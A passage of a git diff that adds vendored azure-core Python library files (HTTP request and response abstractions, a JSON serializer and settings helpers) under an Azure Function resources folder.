OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +try: + import collections.abc as collections +except ImportError: + import collections # type: ignore + +from requests.structures import CaseInsensitiveDict + +from ._http_response_impl import _HttpResponseBaseImpl, HttpResponseImpl, _HttpResponseBackcompatMixinBase +from ..pipeline.transport._requests_basic import StreamDownloadGenerator + +class _ItemsView(collections.ItemsView): + + def __contains__(self, item): + if not (isinstance(item, (list, tuple)) and len(item) == 2): + return False # requests raises here, we just return False + for k, v in self.__iter__(): + if item[0].lower() == k.lower() and item[1] == v: + return True + return False + + def __repr__(self): + return 'ItemsView({})'.format(dict(self.__iter__())) + +class _CaseInsensitiveDict(CaseInsensitiveDict): + """Overriding default requests dict so we can unify + to not raise if users pass in incorrect items to contains. + Instead, we return False + """ + + def items(self): + """Return a new view of the dictionary's items.""" + return _ItemsView(self) + +class _RestRequestsTransportResponseBaseMixin(_HttpResponseBackcompatMixinBase): + """Backcompat mixin for the sync and async requests responses + + Overriding the default mixin behavior here because we need to synchronously + read the response's content for the async requests responses + """ + + def _body(self): + # Since requests is not an async library, for backcompat, users should + # be able to access the body directly without loading it first (like we have to do + # in aiohttp). So here, we set self._content to self._internal_response.content, + # which is similar to read, without the async call. + if self._content is None: + self._content = self._internal_response.content + return self._content + +class _RestRequestsTransportResponseBase(_HttpResponseBaseImpl, _RestRequestsTransportResponseBaseMixin): + def __init__(self, **kwargs): + internal_response = kwargs.pop("internal_response") + content = None + if internal_response._content_consumed: + content = internal_response.content + headers = _CaseInsensitiveDict(internal_response.headers) + super(_RestRequestsTransportResponseBase, self).__init__( + internal_response=internal_response, + status_code=internal_response.status_code, + headers=headers, + reason=internal_response.reason, + content_type=headers.get('content-type'), + content=content, + **kwargs + ) + +class RestRequestsTransportResponse(HttpResponseImpl, _RestRequestsTransportResponseBase): + + def __init__(self, **kwargs): + super(RestRequestsTransportResponse, self).__init__( + stream_download_generator=StreamDownloadGenerator, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py new file mode 100644 index 0000000..41b21a6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_requests_trio.py @@ -0,0 +1,45 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import trio +from ._http_response_impl_async import AsyncHttpResponseImpl +from ._requests_basic import _RestRequestsTransportResponseBase +from ..pipeline.transport._requests_trio import TrioStreamDownloadGenerator + +class RestTrioRequestsTransportResponse(AsyncHttpResponseImpl, _RestRequestsTransportResponseBase): # type: ignore + """Asynchronous streaming of data from the response. + """ + + def __init__(self, **kwargs): + super().__init__( + stream_download_generator=TrioStreamDownloadGenerator, + **kwargs + ) + + async def close(self) -> None: + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await trio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py new file mode 100644 index 0000000..8e1412a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest.py @@ -0,0 +1,375 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc +import copy + +from typing import TYPE_CHECKING, MutableMapping + +from ..utils._utils import case_insensitive_dict +from ._helpers import ( + set_content_body, + set_json_body, + set_multipart_body, + set_urlencoded_body, + _format_parameters_helper, + HttpRequestBackcompatMixin, +) +if TYPE_CHECKING: + from typing import ( + Iterable, + Optional, + Any, + Iterator, + Union, + Dict, + ) + ByteStream = Iterable[bytes] + ContentType = Union[str, bytes, ByteStream] + + from ._helpers import ContentTypeBase as ContentType + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +################################## CLASSES ###################################### + +class HttpRequest(HttpRequestBackcompatMixin): + """HTTP request. + + It should be passed to your client's `send_request` method. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: The url for your request + :keyword mapping params: Query parameters to be mapped into your URL. Your input + should be a mapping of query name to query value(s). + :keyword mapping headers: HTTP headers you want in your request. Your input should + be a mapping of header name to header value. + :keyword any json: A JSON serializable object. We handle JSON-serialization for your + object, so use this for more complicated data structures than `data`. + :keyword content: Content you want in your request body. Think of it as the kwarg you should input + if your data doesn't fit into `json`, `data`, or `files`. Accepts a bytes type, or a generator + that yields bytes. + :paramtype content: str or bytes or iterable[bytes] + :keyword dict data: Form data you want in your request body. Use for form-encoded data, i.e. + HTML forms. + :keyword mapping files: Files you want to in your request body. Use for uploading files with + multipart encoding. Your input should be a mapping of file name to file content. + Use the `data` kwarg in addition if you want to include non-file data files as part of your request. + :ivar str url: The URL this request is against. + :ivar str method: The method type of this request. + :ivar mapping headers: The HTTP headers you passed in to your request + :ivar bytes content: The content passed in for the request + """ + + def __init__(self, method, url, **kwargs): + # type: (str, str, Any) -> None + + self.url = url + self.method = method + + params = kwargs.pop("params", None) + if params: + _format_parameters_helper(self, params) + self._files = None + self._data = None + + default_headers = self._set_body( + content=kwargs.pop("content", None), + data=kwargs.pop("data", None), + files=kwargs.pop("files", None), + json=kwargs.pop("json", None), + ) + self.headers = case_insensitive_dict(default_headers) + self.headers.update(kwargs.pop("headers", {})) + + if kwargs: + raise TypeError( + "You have passed in kwargs '{}' that are not valid kwargs.".format( + "', '".join(list(kwargs.keys())) + ) + ) + + def _set_body(self, **kwargs): + # type: (Any) -> MutableMapping[str, str] + """Sets the body of the request, and returns the default headers + """ + content = kwargs.pop("content", None) + data = kwargs.pop("data", None) + files = kwargs.pop("files", None) + json = kwargs.pop("json", None) + default_headers: MutableMapping[str, str] = {} + if data is not None and not isinstance(data, dict): + # should we warn? + content = data + if content is not None: + default_headers, self._data = set_content_body(content) + return default_headers + if json is not None: + default_headers, self._data = set_json_body(json) + return default_headers + if files: + default_headers, self._files = set_multipart_body(files) + if data: + default_headers, self._data = set_urlencoded_body(data, bool(files)) + return default_headers + + def _update_headers(self, default_headers): + # type: (Dict[str, str]) -> None + for name, value in default_headers.items(): + if name == "Transfer-Encoding" and "Content-Length" in self.headers: + continue + self.headers.setdefault(name, value) + + @property + def content(self): + # type: (...) -> Any + """Get's the request's content + + :return: The request's content + :rtype: any + """ + return self._data or self._files + + def __repr__(self): + # type: (...) -> str + return "".format( + self.method, self.url + ) + + def __deepcopy__(self, memo=None): + try: + request = HttpRequest( + method=self.method, + url=self.url, + headers=self.headers, + ) + request._data = copy.deepcopy(self._data, memo) + request._files = copy.deepcopy(self._files, memo) + self._add_backcompat_properties(request, memo) + return request + except (ValueError, TypeError): + return copy.copy(self) + +class _HttpResponseBase(ABC): + + @property + @abc.abstractmethod + def request(self): + # type: (...) -> HttpRequest + """The request that resulted in this response. + + :rtype: ~azure.core.rest.HttpRequest + """ + + @property + @abc.abstractmethod + def status_code(self): + # type: (...) -> int + """The status code of this response. + + :rtype: int + """ + + @property + @abc.abstractmethod + def headers(self): + # type: (...) -> Optional[MutableMapping[str, str]] + """The response headers. Must be case-insensitive. + + :rtype: MutableMapping[str, str] + """ + + @property + @abc.abstractmethod + def reason(self): + # type: (...) -> str + """The reason phrase for this response. + + :rtype: str + """ + + @property + @abc.abstractmethod + def content_type(self): + # type: (...) -> Optional[str] + """The content type of the response. + + :rtype: str + """ + + @property + @abc.abstractmethod + def is_closed(self): + # type: (...) -> bool + """Whether the network connection has been closed yet. + + :rtype: bool + """ + + @property + @abc.abstractmethod + def is_stream_consumed(self): + # type: (...) -> bool + """Whether the stream has been consumed. + + :rtype: bool + """ + + @property + @abc.abstractmethod + def encoding(self): + # type: (...) -> Optional[str] + """Returns the response encoding. + + :return: The response encoding. We either return the encoding set by the user, + or try extracting the encoding from the response's content type. If all fails, + we return `None`. + :rtype: optional[str] + """ + + @encoding.setter + def encoding(self, value): + # type: (str) -> None + """Sets the response encoding. + + :rtype: None + """ + + @property + @abc.abstractmethod + def url(self): + # type: (...) -> str + """The URL that resulted in this response. + + :rtype: str + """ + + @abc.abstractmethod + def text(self, encoding=None): + # type: (Optional[str]) -> str + """Returns the response body as a string. + + :param optional[str] encoding: The encoding you want to decode the text with. Can + also be set independently through our encoding property + :return: The response's content decoded as a string. + :rtype: str + """ + + @abc.abstractmethod + def json(self): + # type: (...) -> Any + """Returns the whole body as a json object. + + :return: The JSON deserialized response body + :rtype: any + :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable: + """ + + @abc.abstractmethod + def raise_for_status(self): + # type: (...) -> None + """Raises an HttpResponseError if the response has an error status code. + + If response is good, does nothing. + + :rtype: None + :raises ~azure.core.HttpResponseError if the object has an error status code.: + """ + + @property + @abc.abstractmethod + def content(self): + # type: (...) -> bytes + """Return the response's content in bytes. + + :rtype: bytes + """ + + +class HttpResponse(_HttpResponseBase): + """Abstract base class for HTTP responses. + + Use this abstract base class to create your own transport responses. + + Responses implementing this ABC are returned from your client's `send_request` method + if you pass in an :class:`~azure.core.rest.HttpRequest` + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + """ + + @abc.abstractmethod + def __enter__(self): + # type: (...) -> HttpResponse + """Enter this response""" + + @abc.abstractmethod + def close(self): + # type: (...) -> None + """Close this response""" + + @abc.abstractmethod + def __exit__(self, *args): + # type: (...) -> None + """Exit this response""" + + @abc.abstractmethod + def read(self): + # type: (...) -> bytes + """Read the response's bytes. + + :return: The read in bytes + :rtype: bytes + """ + + @abc.abstractmethod + def iter_raw(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes. Will not decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + + @abc.abstractmethod + def iter_bytes(self, **kwargs): + # type: (Any) -> Iterator[bytes] + """Iterates over the response's bytes. Will decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py new file mode 100644 index 0000000..18ab229 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_rest_py3.py @@ -0,0 +1,429 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc +import copy +from typing import ( + Any, + AsyncIterable, + AsyncIterator, + Iterable, Iterator, + Optional, + Union, + MutableMapping, +) + +from ..utils._utils import case_insensitive_dict + +from ._helpers import ( + ParamsType, + FilesType, + set_json_body, + set_multipart_body, + set_urlencoded_body, + _format_parameters_helper, + HttpRequestBackcompatMixin, + set_content_body, +) + +ContentType = Union[str, bytes, Iterable[bytes], AsyncIterable[bytes]] + +################################## CLASSES ###################################### + +class HttpRequest(HttpRequestBackcompatMixin): + """An HTTP request. + + It should be passed to your client's `send_request` method. + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: The url for your request + :keyword mapping params: Query parameters to be mapped into your URL. Your input + should be a mapping of query name to query value(s). + :keyword mapping headers: HTTP headers you want in your request. Your input should + be a mapping of header name to header value. + :keyword any json: A JSON serializable object. We handle JSON-serialization for your + object, so use this for more complicated data structures than `data`. + :keyword content: Content you want in your request body. Think of it as the kwarg you should input + if your data doesn't fit into `json`, `data`, or `files`. Accepts a bytes type, or a generator + that yields bytes. + :paramtype content: str or bytes or iterable[bytes] or asynciterable[bytes] + :keyword dict data: Form data you want in your request body. Use for form-encoded data, i.e. + HTML forms. + :keyword mapping files: Files you want to in your request body. Use for uploading files with + multipart encoding. Your input should be a mapping of file name to file content. + Use the `data` kwarg in addition if you want to include non-file data files as part of your request. + :ivar str url: The URL this request is against. + :ivar str method: The method type of this request. + :ivar mapping headers: The HTTP headers you passed in to your request + :ivar any content: The content passed in for the request + """ + + def __init__( + self, + method: str, + url: str, + *, + params: Optional[ParamsType] = None, + headers: Optional[MutableMapping[str, str]] = None, + json: Any = None, + content: Optional[ContentType] = None, + data: Optional[dict] = None, + files: Optional[FilesType] = None, + **kwargs + ): + self.url = url + self.method = method + + if params: + _format_parameters_helper(self, params) + self._files = None + self._data = None # type: Any + + default_headers = self._set_body( + content=content, + data=data, + files=files, + json=json, + ) + self.headers = case_insensitive_dict(default_headers) + self.headers.update(headers or {}) + + if kwargs: + raise TypeError( + "You have passed in kwargs '{}' that are not valid kwargs.".format( + "', '".join(list(kwargs.keys())) + ) + ) + + def _set_body( + self, + content: Optional[ContentType] = None, + data: Optional[dict] = None, + files: Optional[FilesType] = None, + json: Any = None, + ) -> MutableMapping[str, str]: + """Sets the body of the request, and returns the default headers + """ + default_headers = {} # type: MutableMapping[str, str] + if data is not None and not isinstance(data, dict): + # should we warn? + content = data + if content is not None: + default_headers, self._data = set_content_body(content) + return default_headers + if json is not None: + default_headers, self._data = set_json_body(json) + return default_headers + if files: + default_headers, self._files = set_multipart_body(files) + if data: + default_headers, self._data = set_urlencoded_body(data, has_files=bool(files)) + return default_headers + + @property + def content(self) -> Any: + """Get's the request's content + + :return: The request's content + :rtype: any + """ + return self._data or self._files + + def __repr__(self) -> str: + return "".format( + self.method, self.url + ) + + def __deepcopy__(self, memo=None) -> "HttpRequest": + try: + request = HttpRequest( + method=self.method, + url=self.url, + headers=self.headers, + ) + request._data = copy.deepcopy(self._data, memo) + request._files = copy.deepcopy(self._files, memo) + self._add_backcompat_properties(request, memo) + return request + except (ValueError, TypeError): + return copy.copy(self) + +class _HttpResponseBase(abc.ABC): + """Base abstract base class for HttpResponses. + """ + + @property + @abc.abstractmethod + def request(self) -> HttpRequest: + """The request that resulted in this response. + + :rtype: ~azure.core.rest.HttpRequest + """ + ... + + @property + @abc.abstractmethod + def status_code(self) -> int: + """The status code of this response. + + :rtype: int + """ + ... + + @property + @abc.abstractmethod + def headers(self) -> MutableMapping[str, str]: + """The response headers. Must be case-insensitive. + + :rtype: MutableMapping[str, str] + """ + ... + + @property + @abc.abstractmethod + def reason(self) -> str: + """The reason phrase for this response. + + :rtype: str + """ + ... + + @property + @abc.abstractmethod + def content_type(self) -> Optional[str]: + """The content type of the response. + + :rtype: str + """ + ... + + @property + @abc.abstractmethod + def is_closed(self) -> bool: + """Whether the network connection has been closed yet. + + :rtype: bool + """ + ... + + @property + @abc.abstractmethod + def is_stream_consumed(self) -> bool: + """Whether the stream has been consumed. + + :rtype: bool + """ + ... + + @property + @abc.abstractmethod + def encoding(self) -> Optional[str]: + """Returns the response encoding. + + :return: The response encoding. We either return the encoding set by the user, + or try extracting the encoding from the response's content type. If all fails, + we return `None`. + :rtype: optional[str] + """ + ... + + @encoding.setter + def encoding(self, value: Optional[str]) -> None: + """Sets the response encoding. + + :rtype: None + """ + + @property + @abc.abstractmethod + def url(self) -> str: + """The URL that resulted in this response. + + :rtype: str + """ + ... + + @property + @abc.abstractmethod + def content(self) -> bytes: + """Return the response's content in bytes. + + :rtype: bytes + """ + ... + + @abc.abstractmethod + def text(self, encoding: Optional[str] = None) -> str: + """Returns the response body as a string. + + :param optional[str] encoding: The encoding you want to decode the text with. Can + also be set independently through our encoding property + :return: The response's content decoded as a string. + :rtype: str + """ + ... + + @abc.abstractmethod + def json(self) -> Any: + """Returns the whole body as a json object. + + :return: The JSON deserialized response body + :rtype: any + :raises json.decoder.JSONDecodeError or ValueError (in python 2.7) if object is not JSON decodable: + """ + ... + + @abc.abstractmethod + def raise_for_status(self) -> None: + """Raises an HttpResponseError if the response has an error status code. + + If response is good, does nothing. + + :rtype: None + :raises ~azure.core.HttpResponseError if the object has an error status code.: + """ + ... + +class HttpResponse(_HttpResponseBase): + """Abstract base class for HTTP responses. + + Use this abstract base class to create your own transport responses. + + Responses implementing this ABC are returned from your client's `send_request` method + if you pass in an :class:`~azure.core.rest.HttpRequest` + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = client.send_request(request) + + """ + + @abc.abstractmethod + def __enter__(self) -> "HttpResponse": + ... + + @abc.abstractmethod + def __exit__(self, *args) -> None: + ... + + @abc.abstractmethod + def close(self) -> None: + ... + + @abc.abstractmethod + def read(self) -> bytes: + """Read the response's bytes. + + :return: The read in bytes + :rtype: bytes + """ + ... + + @abc.abstractmethod + def iter_raw(self, **kwargs: Any) -> Iterator[bytes]: + """Iterates over the response's bytes. Will not decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + ... + + @abc.abstractmethod + def iter_bytes(self, **kwargs: Any) -> Iterator[bytes]: + """Iterates over the response's bytes. Will decompress in the process. + + :return: An iterator of bytes from the response + :rtype: Iterator[str] + """ + ... + + def __repr__(self) -> str: + content_type_str = ( + ", Content-Type: {}".format(self.content_type) if self.content_type else "" + ) + return "".format( + self.status_code, self.reason, content_type_str + ) + +class AsyncHttpResponse(_HttpResponseBase): + """Abstract base class for Async HTTP responses. + + Use this abstract base class to create your own transport responses. + + Responses implementing this ABC are returned from your async client's `send_request` + method if you pass in an :class:`~azure.core.rest.HttpRequest` + + >>> from azure.core.rest import HttpRequest + >>> request = HttpRequest('GET', 'http://www.example.com') + + >>> response = await client.send_request(request) + + """ + + @abc.abstractmethod + async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + ... + + @abc.abstractmethod + async def iter_raw(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will not decompress in the process. + + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + raise NotImplementedError() + # getting around mypy behavior, see https://github.com/python/mypy/issues/10732 + yield # pylint: disable=unreachable + + @abc.abstractmethod + async def iter_bytes(self, **kwargs: Any) -> AsyncIterator[bytes]: + """Asynchronously iterates over the response's bytes. Will decompress in the process. + + :return: An async iterator of bytes from the response + :rtype: AsyncIterator[bytes] + """ + raise NotImplementedError() + # getting around mypy behavior, see https://github.com/python/mypy/issues/10732 + yield # pylint: disable=unreachable + + @abc.abstractmethod + async def close(self) -> None: + ... + + @abc.abstractmethod + async def __aexit__(self, *args) -> None: + ... diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py new file mode 100644 index 0000000..05fe221 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/serialization.py @@ -0,0 +1,125 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import base64 +from json import JSONEncoder +from typing import Union, cast +from datetime import datetime, date, time, timedelta +from .utils._utils import _FixedOffset + + +__all__ = ["NULL", "AzureJSONEncoder"] + + +class _Null(object): + """To create a Falsy object""" + + def __bool__(self): + return False + + __nonzero__ = __bool__ # Python2 compatibility + + +NULL = _Null() +""" +A falsy sentinel object which is supposed to be used to specify attributes +with no data. This gets serialized to `null` on the wire. +""" + + +def _timedelta_as_isostr(td): + # type: (timedelta) -> str + """Converts a datetime.timedelta object into an ISO 8601 formatted string, e.g. 'P4DT12H30M05S' + + Function adapted from the Tin Can Python project: https://github.com/RusticiSoftware/TinCanPython + """ + + # Split seconds to larger units + seconds = td.total_seconds() + minutes, seconds = divmod(seconds, 60) + hours, minutes = divmod(minutes, 60) + days, hours = divmod(hours, 24) + + days, hours, minutes = list(map(int, (days, hours, minutes))) + seconds = round(seconds, 6) + + # Build date + date_str = "" + if days: + date_str = "%sD" % days + + # Build time + time_str = "T" + + # Hours + bigger_exists = date_str or hours + if bigger_exists: + time_str += "{:02}H".format(hours) + + # Minutes + bigger_exists = bigger_exists or minutes + if bigger_exists: + time_str += "{:02}M".format(minutes) + + # Seconds + try: + if seconds.is_integer(): + seconds_string = "{:02}".format(int(seconds)) + else: + # 9 chars long w/ leading 0, 6 digits after decimal + seconds_string = "%09.6f" % seconds + # Remove trailing zeros + seconds_string = seconds_string.rstrip("0") + except AttributeError: # int.is_integer() raises + seconds_string = "{:02}".format(seconds) + + time_str += "{}S".format(seconds_string) + + return "P" + date_str + time_str + + +def _datetime_as_isostr(dt): + # type: (Union[datetime, date, time, timedelta]) -> str + """Converts a datetime.(datetime|date|time|timedelta) object into an ISO 8601 formatted string""" + # First try datetime.datetime + if hasattr(dt, "year") and hasattr(dt, "hour"): + dt = cast(datetime, dt) + # astimezone() fails for naive times in Python 2.7, so make make sure dt is aware (tzinfo is set) + if not dt.tzinfo: + iso_formatted = dt.replace(tzinfo=TZ_UTC).isoformat() + else: + iso_formatted = dt.astimezone(TZ_UTC).isoformat() + # Replace the trailing "+00:00" UTC offset with "Z" (RFC 3339: https://www.ietf.org/rfc/rfc3339.txt) + return iso_formatted.replace("+00:00", "Z") + # Next try datetime.date or datetime.time + try: + dt = cast(Union[date, time], dt) + return dt.isoformat() + # Last, try datetime.timedelta + except AttributeError: + dt = cast(timedelta, dt) + return _timedelta_as_isostr(dt) + + +try: + from datetime import timezone + + TZ_UTC = timezone.utc # type: ignore +except ImportError: + TZ_UTC = _FixedOffset(0) # type: ignore + + +class AzureJSONEncoder(JSONEncoder): + """A JSON encoder that's capable of serializing datetime objects and bytes.""" + + def default(self, o): # pylint: disable=too-many-return-statements + if isinstance(o, (bytes, bytearray)): + return base64.b64encode(o).decode() + try: + return _datetime_as_isostr(o) + except AttributeError: + pass + return super(AzureJSONEncoder, self).default(o) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py new file mode 100644 index 0000000..f20ae5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/settings.py @@ -0,0 +1,438 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +# THE SOFTWARE. +# +# -------------------------------------------------------------------------- +"""Provide access to settings for globally used Azure configuration values. +""" + +from collections import namedtuple +from enum import Enum +import logging +import os +import sys +import six +from azure.core.tracing import AbstractSpan + +try: + from typing import Type, Optional, Dict, Callable, cast, TYPE_CHECKING +except ImportError: + TYPE_CHECKING = False + +if TYPE_CHECKING: + from typing import Any, Union + try: + # pylint:disable=unused-import + from azure.core.tracing.ext.opencensus_span import OpenCensusSpan # pylint:disable=redefined-outer-name + except ImportError: + pass + +__all__ = ("settings", "Settings") + + +# https://www.python.org/dev/peps/pep-0484/#support-for-singleton-types-in-unions +class _Unset(Enum): + token = 0 +_unset = _Unset.token + + +def convert_bool(value): + # type: (Union[str, bool]) -> bool + """Convert a string to True or False + + If a boolean is passed in, it is returned as-is. Otherwise the function + maps the following strings, ignoring case: + + * "yes", "1", "on" -> True + " "no", "0", "off" -> False + + :param value: the value to convert + :type value: string + :returns: int + :raises ValueError: If conversion to bool fails + + """ + if value in (True, False): + return cast(bool, value) + val = cast(str, value).lower() + if val in ["yes", "1", "on", "true", "True"]: + return True + if val in ["no", "0", "off", "false", "False"]: + return False + raise ValueError("Cannot convert {} to boolean value".format(value)) + + +_levels = { + "CRITICAL": logging.CRITICAL, + "ERROR": logging.ERROR, + "WARNING": logging.WARNING, + "INFO": logging.INFO, + "DEBUG": logging.DEBUG, +} + + +def convert_logging(value): + # type: (Union[str, int]) -> int + """Convert a string to a Python logging level + + If a log level is passed in, it is returned as-is. Otherwise the function + understands the following strings, ignoring case: + + * "critical" + * "error" + * "warning" + * "info" + * "debug" + + :param value: the value to convert + :type value: string + :returns: int + :raises ValueError: If conversion to log level fails + + """ + if value in set(_levels.values()): + return cast(int, value) + val = cast(str, value).upper() + level = _levels.get(val) + if not level: + raise ValueError("Cannot convert {} to log level, valid values are: {}".format(value, ", ".join(_levels))) + return level + + +def get_opencensus_span(): + # type: () -> Optional[Type[AbstractSpan]] + """Returns the OpenCensusSpan if opencensus is installed else returns None""" + try: + from azure.core.tracing.ext.opencensus_span import OpenCensusSpan # pylint:disable=redefined-outer-name + + return OpenCensusSpan + except ImportError: + return None + + +def get_opencensus_span_if_opencensus_is_imported(): + # type: () -> Optional[Type[AbstractSpan]] + if "opencensus" not in sys.modules: + return None + return get_opencensus_span() + + +_tracing_implementation_dict = { + "opencensus": get_opencensus_span +} # type: Dict[str, Callable[[], Optional[Type[AbstractSpan]]]] + + +def convert_tracing_impl(value): + # type: (Union[str, Type[AbstractSpan]]) -> Optional[Type[AbstractSpan]] + """Convert a string to AbstractSpan + + If a AbstractSpan is passed in, it is returned as-is. Otherwise the function + understands the following strings, ignoring case: + + * "opencensus" + + :param value: the value to convert + :type value: string + :returns: AbstractSpan + :raises ValueError: If conversion to AbstractSpan fails + + """ + if value is None: + return get_opencensus_span_if_opencensus_is_imported() + + if not isinstance(value, six.string_types): + value = cast(Type[AbstractSpan], value) + return value + + value = cast(str, value) # mypy clarity + value = value.lower() + get_wrapper_class = _tracing_implementation_dict.get(value, lambda: 